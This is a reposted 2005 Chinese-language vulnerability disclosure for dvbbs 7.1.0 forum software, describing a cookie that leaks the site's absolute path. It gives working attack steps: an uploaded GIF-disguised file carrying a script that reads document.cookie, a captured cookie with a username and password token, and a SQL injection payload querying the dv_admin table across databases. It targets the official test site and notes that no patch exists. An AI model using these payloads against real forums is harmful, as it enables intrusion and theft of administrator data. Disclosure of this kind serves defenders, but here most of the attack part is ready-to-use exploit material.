您的位置:首页 > 编程语言 > VB

dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

2005-07-04 15:42 471 查看
动网官方与站长站均存在严重漏洞,可大致入侵,内有说名,请尽快修复!
dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现sql跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图,代码如下:
gif89a
<script>
alert(document.cookie)
</script>

抓包得到cookie如下
cookie: aspsessionidssdscbqd=nhanobncapcpamcfmagdijcb; dwebdvbbs7%2e1%2e0=userid=617054&usercookies=1&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzibct&password=t8ob621664s5v6hl&userhidden=2&statuserid=2189992004; dvbbs=
分析cookie可以得到站点的绝对路径如下:
d://web//dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入点假设:
www.host.com//linzi.asp?****=you
论谈为dvbbs 7.1.0 ,数据库为data////dvbbs.asp,做了防下载处理.
利用上面的动网暴路径,抓包得到绝对路径为 d://www//dvbbs//data//dvbbs.asp
实现跨库查询如下:
www.host.com//linzi.asp?****=you and (select count(*) from dv_admin in "d://www//dvbbs//data//dvbbs.asp")
官方补丁:
尚无
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: